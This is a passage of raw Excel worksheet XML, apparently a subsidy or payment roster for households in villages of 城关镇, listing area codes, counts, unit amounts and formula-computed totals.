    <row r="41" customHeight="1" spans="1:11">
      <c r="A41" s="23" t="s">
        <v>341</v>
      </c>
      <c r="B41" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C41" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D41" s="23" t="s">
        <v>342</v>
      </c>
      <c r="E41" s="23" t="s">
        <v>343</v>
      </c>
      <c r="F41" s="24" t="str">
        <f>F40</f>
        <v>4113210103</v>
      </c>
      <c r="G41" s="24"/>
      <c r="H41" s="24"/>
      <c r="I41" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J41" s="24"/>
      <c r="K41" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="42" customHeight="1" spans="1:11">
      <c r="A42" s="23" t="s">
        <v>344</v>
      </c>
      <c r="B42" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C42" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D42" s="24" t="s">
        <v>345</v>
      </c>
      <c r="E42" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F42" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G42" s="24">
        <v>2</v>
      </c>
      <c r="H42" s="25">
        <v>325</v>
      </c>
      <c r="I42" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J42" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K42" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="43" customHeight="1" spans="1:11">
      <c r="A43" s="23" t="s">
        <v>347</v>
      </c>
      <c r="B43" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C43" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D43" s="23" t="s">
        <v>348</v>
      </c>
      <c r="E43" s="23" t="s">
        <v>349</v>
      </c>
      <c r="F43" s="24" t="str">
        <f>F42</f>
        <v>4113210108</v>
      </c>
      <c r="G43" s="24"/>
      <c r="H43" s="24"/>
      <c r="I43" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J43" s="24"/>
      <c r="K43" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="44" customHeight="1" spans="1:11">
      <c r="A44" s="23" t="s">
        <v>350</v>
      </c>
      <c r="B44" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C44" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D44" s="24" t="s">
        <v>351</v>
      </c>
      <c r="E44" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F44" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G44" s="24">
        <v>1</v>
      </c>
      <c r="H44" s="25">
        <v>365</v>
      </c>
      <c r="I44" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J44" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K44" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="45" customHeight="1" spans="1:11">
      <c r="A45" s="23" t="s">
        <v>352</v>
      </c>
      <c r="B45" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C45" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D45" s="24" t="s">
        <v>353</v>
      </c>
      <c r="E45" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F45" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G45" s="24">
        <v>1</v>
      </c>
      <c r="H45" s="25">
        <v>365</v>
      </c>
      <c r="I45" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J45" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K45" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="1:11">
      <c r="A46" s="23" t="s">
        <v>354</v>
      </c>
      <c r="B46" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C46" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D46" s="24" t="s">
        <v>355</v>
      </c>
      <c r="E46" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F46" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G46" s="24">
        <v>1</v>
      </c>
      <c r="H46" s="25">
        <v>365</v>
      </c>
      <c r="I46" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J46" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K46" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="47" customHeight="1" spans="1:11">
      <c r="A47" s="23" t="s">
        <v>356</v>
      </c>
      <c r="B47" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C47" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D47" s="24" t="s">
        <v>357</v>
      </c>
      <c r="E47" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F47" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G47" s="24">
        <v>2</v>
      </c>
      <c r="H47" s="25">
        <v>325</v>
      </c>
      <c r="I47" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J47" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K47" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="1:11">
      <c r="A48" s="23" t="s">
        <v>358</v>
      </c>
      <c r="B48" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C48" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D48" s="23" t="s">
        <v>359</v>
      </c>
      <c r="E48" s="23" t="s">
        <v>360</v>
      </c>
      <c r="F48" s="24" t="str">
        <f>F47</f>
        <v>4113210102</v>
      </c>
      <c r="G48" s="24"/>
      <c r="H48" s="24"/>
      <c r="I48" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J48" s="24"/>
      <c r="K48" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="1:11">
      <c r="A49" s="23" t="s">
        <v>361</v>
      </c>
      <c r="B49" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C49" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D49" s="24" t="s">
        <v>362</v>
      </c>
      <c r="E49" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F49" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G49" s="24">
        <v>2</v>
      </c>
      <c r="H49" s="25">
        <v>325</v>
      </c>
      <c r="I49" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J49" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K49" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="1:11">
      <c r="A50" s="23" t="s">
        <v>363</v>
      </c>
      <c r="B50" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C50" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D50" s="23" t="s">
        <v>364</v>
      </c>
      <c r="E50" s="23" t="s">
        <v>236</v>
      </c>
      <c r="F50" s="24" t="str">
        <f>F49</f>
        <v>4113210106</v>
      </c>
      <c r="G50" s="24"/>
      <c r="H50" s="24"/>
      <c r="I50" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J50" s="24"/>
      <c r="K50" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="51" customHeight="1" spans="1:11">
      <c r="A51" s="23" t="s">
        <v>365</v>
      </c>
      <c r="B51" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C51" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D51" s="24" t="s">
        <v>366</v>
      </c>
      <c r="E51" s="24" t="s">
        <v>367</v>
      </c>
      <c r="F51" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G51" s="24">
        <v>2</v>
      </c>
      <c r="H51" s="25">
        <v>325</v>
      </c>
      <c r="I51" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J51" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K51" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="52" customHeight="1" spans="1:11">
      <c r="A52" s="23" t="s">
        <v>368</v>
      </c>
      <c r="B52" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C52" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D52" s="23" t="s">
        <v>369</v>
      </c>
      <c r="E52" s="23" t="s">
        <v>370</v>
      </c>
      <c r="F52" s="24" t="str">
        <f>F51</f>
        <v>4113210103</v>
      </c>
      <c r="G52" s="24"/>
      <c r="H52" s="24"/>
      <c r="I52" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J52" s="24"/>
      <c r="K52" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="1:11">
      <c r="A53" s="23" t="s">
        <v>371</v>
      </c>
      <c r="B53" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C53" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D53" s="24" t="s">
        <v>372</v>
      </c>
      <c r="E53" s="24" t="s">
        <v>312</v>
      </c>
      <c r="F53" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G53" s="24">
        <v>2</v>
      </c>
      <c r="H53" s="25">
        <v>325</v>
      </c>
      <c r="I53" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J53" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K53" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="54" customHeight="1" spans="1:11">
      <c r="A54" s="23" t="s">
        <v>373</v>
      </c>
      <c r="B54" s="24" t="str">
        <f>B53</f>
        <v>城关镇</v>
      </c>
      <c r="C54" s="24" t="str">
        <f>C53</f>
        <v>西北村</v>
      </c>
      <c r="D54" s="23" t="s">
        <v>374</v>
      </c>
      <c r="E54" s="23" t="s">
        <v>288</v>
      </c>
      <c r="F54" s="24" t="str">
        <f>F53</f>
        <v>4113210106</v>
      </c>
      <c r="G54" s="24"/>
      <c r="H54" s="24"/>
      <c r="I54" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J54" s="24"/>
      <c r="K54" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="1:11">
      <c r="A55" s="23" t="s">
        <v>375</v>
      </c>
      <c r="B55" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C55" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D55" s="24" t="s">
        <v>376</v>
      </c>
      <c r="E55" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F55" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G55" s="24">
        <v>2</v>
      </c>
      <c r="H55" s="25">
        <v>325</v>
      </c>
      <c r="I55" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J55" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K55" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="1:11">
      <c r="A56" s="23" t="s">
        <v>377</v>
      </c>
      <c r="B56" s="24" t="str">
        <f>B55</f>
        <v>城关镇</v>
      </c>
      <c r="C56" s="24" t="str">
        <f>C55</f>
        <v>中华村</v>
      </c>
      <c r="D56" s="23" t="s">
        <v>378</v>
      </c>
      <c r="E56" s="23" t="s">
        <v>379</v>
      </c>
      <c r="F56" s="24" t="str">
        <f>F55</f>
        <v>4113210108</v>
      </c>
      <c r="G56" s="24"/>
      <c r="H56" s="24"/>
      <c r="I56" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J56" s="24"/>
      <c r="K56" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="1:11">
      <c r="A57" s="23" t="s">
        <v>380</v>
      </c>
      <c r="B57" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C57" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D57" s="24" t="s">
        <v>381</v>
      </c>
      <c r="E57" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F57" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G57" s="24">
        <v>1</v>
      </c>
      <c r="H57" s="25">
        <v>365</v>
      </c>
      <c r="I57" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J57" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K57" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="1:11">
      <c r="A58" s="23" t="s">
        <v>383</v>
      </c>
      <c r="B58" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C58" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D58" s="24" t="s">
        <v>384</v>
      </c>
      <c r="E58" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F58" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G58" s="24">
        <v>1</v>
      </c>
      <c r="H58" s="25">
        <v>365</v>
      </c>
      <c r="I58" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J58" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K58" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="1:11">
      <c r="A59" s="23" t="s">
        <v>385</v>
      </c>
      <c r="B59" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C59" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D59" s="24" t="s">
        <v>386</v>
      </c>
      <c r="E59" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F59" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G59" s="24">
        <v>2</v>
      </c>
      <c r="H59" s="25">
        <v>325</v>
      </c>
      <c r="I59" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J59" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K59" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="1:11">
      <c r="A60" s="23" t="s">
        <v>387</v>
      </c>
      <c r="B60" s="24" t="str">
        <f>B59</f>
        <v>城关镇</v>
      </c>
      <c r="C60" s="24" t="str">
        <f>C59</f>
        <v>西北村</v>
      </c>
      <c r="D60" s="23" t="s">
        <v>388</v>
      </c>
      <c r="E60" s="23" t="s">
        <v>389</v>
      </c>
      <c r="F60" s="24" t="str">
        <f>F59</f>
        <v>4113210106</v>
      </c>
      <c r="G60" s="24"/>
      <c r="H60" s="24"/>
      <c r="I60" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J60" s="24"/>
      <c r="K60" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="61" customHeight="1" spans="1:11">
      <c r="A61" s="23" t="s">
        <v>390</v>
      </c>
      <c r="B61" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C61" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D61" s="24" t="s">
        <v>391</v>
      </c>
      <c r="E61" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F61" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G61" s="24">
        <v>2</v>
      </c>
      <c r="H61" s="25">
        <v>325</v>
      </c>
      <c r="I61" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J61" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K61" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="62" customHeight="1" spans="1:11">
      <c r="A62" s="23" t="s">
        <v>392</v>
      </c>
      <c r="B62" s="24" t="str">
        <f>B61</f>
        <v>城关镇</v>
      </c>
      <c r="C62" s="24" t="str">
        <f>C61</f>
        <v>北外村</v>
      </c>
      <c r="D62" s="23" t="s">
        <v>393</v>
      </c>
      <c r="E62" s="23" t="s">
        <v>394</v>
      </c>
      <c r="F62" s="24" t="str">
        <f>F61</f>
        <v>4113210102</v>
      </c>
      <c r="G62" s="24"/>
      <c r="H62" s="24"/>
      <c r="I62" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J62" s="24"/>
      <c r="K62" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="63" customHeight="1" spans="1:11">
      <c r="A63" s="23" t="s">
        <v>395</v>
      </c>
      <c r="B63" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C63" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D63" s="24" t="s">
        <v>396</v>
      </c>
      <c r="E63" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F63" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G63" s="24">
        <v>2</v>
      </c>
      <c r="H63" s="25">
        <v>325</v>
      </c>
      <c r="I63" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J63" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K63" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="64" customHeight="1" spans="1:11">
      <c r="A64" s="23" t="s">
        <v>398</v>
      </c>
      <c r="B64" s="24" t="str">
        <f>B63</f>
        <v>城关镇</v>
      </c>
      <c r="C64" s="24" t="str">
        <f>C63</f>
        <v>东北六组</v>
      </c>
      <c r="D64" s="23" t="s">
        <v>399</v>
      </c>
      <c r="E64" s="23" t="s">
        <v>288</v>
      </c>
      <c r="F64" s="24" t="str">
        <f>F63</f>
        <v>4113210103</v>
      </c>
      <c r="G64" s="24"/>
      <c r="H64" s="24"/>
      <c r="I64" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J64" s="24"/>
      <c r="K64" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="65" customHeight="1" spans="1:11">
      <c r="A65" s="23" t="s">
        <v>400</v>
      </c>
      <c r="B65" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C65" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D65" s="24" t="s">
        <v>401</v>
      </c>
      <c r="E65" s="24" t="s">
        <v>402</v>
      </c>
      <c r="F65" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G65" s="24">
        <v>1</v>
      </c>
      <c r="H65" s="25">
        <v>365</v>
      </c>
      <c r="I65" s="24">
        <f t="shared" si="0"/>
        <v>365</v>
      </c>
      <c r="J65" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K65" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="66" customHeight="1" spans="1:11">
      <c r="A66" s="23" t="s">
        <v>403</v>
      </c>
      <c r="B66" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C66" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D66" s="24" t="s">
        <v>404</v>
      </c>
      <c r="E66" s="24" t="s">
        <v>405</v>
      </c>
      <c r="F66" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G66" s="24">
        <v>2</v>
      </c>
      <c r="H66" s="25">
        <v>325</v>
      </c>
      <c r="I66" s="24">
        <f t="shared" si="0"/>
        <v>650</v>
      </c>
      <c r="J66" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K66" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="67" customHeight="1" spans="1:11">
      <c r="A67" s="23" t="s">
        <v>406</v>
      </c>
      <c r="B67" s="24" t="str">
        <f>B66</f>
        <v>城关镇</v>
      </c>
      <c r="C67" s="24" t="str">
        <f>C66</f>
        <v>中华村</v>
      </c>
      <c r="D67" s="23" t="s">
        <v>407</v>
      </c>
      <c r="E67" s="23" t="s">
        <v>408</v>
      </c>
      <c r="F67" s="24" t="str">
        <f>F66</f>
        <v>4113210108</v>
      </c>
      <c r="G67" s="24"/>
      <c r="H67" s="24"/>
      <c r="I67" s="24">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J67" s="24"/>
      <c r="K67" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="68" customHeight="1" spans="1:11">
      <c r="A68" s="23" t="s">
        <v>409</v>
      </c>
      <c r="B68" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C68" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D68" s="24" t="s">
        <v>410</v>
      </c>
      <c r="E68" s="24" t="s">
        <v>411</v>
      </c>
      <c r="F68" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G68" s="24">
        <v>1</v>
      </c>
      <c r="H68" s="25">
        <v>365</v>
      </c>
      <c r="I68" s="24">
        <f t="shared" ref="I68:I131" si="1">H68*G68</f>
        <v>365</v>
      </c>
      <c r="J68" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K68" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="69" customHeight="1" spans="1:11">
      <c r="A69" s="23" t="s">
        <v>412</v>
      </c>
      <c r="B69" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C69" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D69" s="24" t="s">
        <v>413</v>
      </c>
      <c r="E69" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F69" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G69" s="24">
        <v>2</v>
      </c>
      <c r="H69" s="25">
        <v>325</v>
      </c>
      <c r="I69" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J69" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K69" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="70" customHeight="1" spans="1:11">
      <c r="A70" s="23" t="s">
        <v>414</v>
      </c>
      <c r="B70" s="24" t="str">
        <f>B69</f>
        <v>城关镇</v>
      </c>
      <c r="C70" s="24" t="str">
        <f>C69</f>
        <v>中华村</v>
      </c>
      <c r="D70" s="23" t="s">
        <v>415</v>
      </c>
      <c r="E70" s="23" t="s">
        <v>416</v>
      </c>
      <c r="F70" s="24" t="str">
        <f>F69</f>
        <v>4113210108</v>
      </c>
      <c r="G70" s="24"/>
      <c r="H70" s="24"/>
      <c r="I70" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J70" s="24"/>
      <c r="K70" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="71" customHeight="1" spans="1:11">
      <c r="A71" s="23" t="s">
        <v>417</v>
      </c>
      <c r="B71" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C71" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D71" s="24" t="s">
        <v>418</v>
      </c>
      <c r="E71" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F71" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G71" s="24">
        <v>1</v>
      </c>
      <c r="H71" s="25">
        <v>365</v>
      </c>
      <c r="I71" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J71" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K71" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="72" customHeight="1" spans="1:11">
      <c r="A72" s="23" t="s">
        <v>419</v>
      </c>
      <c r="B72" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C72" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D72" s="24" t="s">
        <v>420</v>
      </c>
      <c r="E72" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F72" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G72" s="24">
        <v>1</v>
      </c>
      <c r="H72" s="25">
        <v>365</v>
      </c>
      <c r="I72" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J72" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K72" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="73" customHeight="1" spans="1:11">
      <c r="A73" s="23" t="s">
        <v>421</v>
      </c>
      <c r="B73" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C73" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D73" s="24" t="s">
        <v>422</v>
      </c>
      <c r="E73" s="24" t="s">
        <v>416</v>
      </c>
      <c r="F73" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G73" s="24">
        <v>1</v>
      </c>
      <c r="H73" s="25">
        <v>365</v>
      </c>
      <c r="I73" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J73" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K73" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="74" customHeight="1" spans="1:11">
      <c r="A74" s="23" t="s">
        <v>423</v>
      </c>
      <c r="B74" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C74" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D74" s="24" t="s">
        <v>424</v>
      </c>
      <c r="E74" s="24" t="s">
        <v>425</v>
      </c>
      <c r="F74" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G74" s="24">
        <v>1</v>
      </c>
      <c r="H74" s="25">
        <v>365</v>
      </c>
      <c r="I74" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J74" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K74" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="75" customHeight="1" spans="1:11">
      <c r="A75" s="23" t="s">
        <v>426</v>
      </c>
      <c r="B75" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C75" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D75" s="24" t="s">
        <v>427</v>
      </c>
      <c r="E75" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F75" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G75" s="24">
        <v>1</v>
      </c>
      <c r="H75" s="25">
        <v>365</v>
      </c>
      <c r="I75" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J75" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K75" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="76" customHeight="1" spans="1:11">
      <c r="A76" s="23" t="s">
        <v>428</v>
      </c>
      <c r="B76" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C76" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D76" s="24" t="s">
        <v>429</v>
      </c>
      <c r="E76" s="24" t="s">
        <v>405</v>
      </c>
      <c r="F76" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G76" s="24">
        <v>1</v>
      </c>
      <c r="H76" s="25">
        <v>365</v>
      </c>
      <c r="I76" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J76" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K76" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="77" customHeight="1" spans="1:11">
      <c r="A77" s="23" t="s">
        <v>430</v>
      </c>
      <c r="B77" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C77" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D77" s="24" t="s">
        <v>431</v>
      </c>
      <c r="E77" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F77" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G77" s="24">
        <v>1</v>
      </c>
      <c r="H77" s="25">
        <v>365</v>
      </c>
      <c r="I77" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J77" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K77" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="78" customHeight="1" spans="1:11">
      <c r="A78" s="23" t="s">
        <v>433</v>
      </c>
      <c r="B78" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C78" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D78" s="24" t="s">
        <v>434</v>
      </c>
      <c r="E78" s="24" t="s">
        <v>435</v>
      </c>
      <c r="F78" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G78" s="24">
        <v>1</v>
      </c>
      <c r="H78" s="24">
        <v>420</v>
      </c>
      <c r="I78" s="24">
        <f t="shared" si="1"/>
        <v>420</v>
      </c>
      <c r="J78" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K78" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="79" customHeight="1" spans="1:11">
      <c r="A79" s="23" t="s">
        <v>436</v>
      </c>
      <c r="B79" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C79" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D79" s="24" t="s">
        <v>437</v>
      </c>
      <c r="E79" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F79" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G79" s="24">
        <v>1</v>
      </c>
      <c r="H79" s="25">
        <v>365</v>
      </c>
      <c r="I79" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J79" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K79" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="80" customHeight="1" spans="1:11">
      <c r="A80" s="23" t="s">
        <v>438</v>
      </c>
      <c r="B80" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C80" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D80" s="24" t="s">
        <v>439</v>
      </c>
      <c r="E80" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F80" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G80" s="24">
        <v>1</v>
      </c>
      <c r="H80" s="25">
        <v>365</v>
      </c>
      <c r="I80" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J80" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K80" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="81" customHeight="1" spans="1:11">
      <c r="A81" s="23" t="s">
        <v>440</v>
      </c>
      <c r="B81" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C81" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D81" s="24" t="s">
        <v>441</v>
      </c>
      <c r="E81" s="24" t="s">
        <v>442</v>
      </c>
      <c r="F81" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G81" s="24">
        <v>2</v>
      </c>
      <c r="H81" s="25">
        <v>325</v>
      </c>
      <c r="I81" s="24">
        <f t="shared" si="1"/>
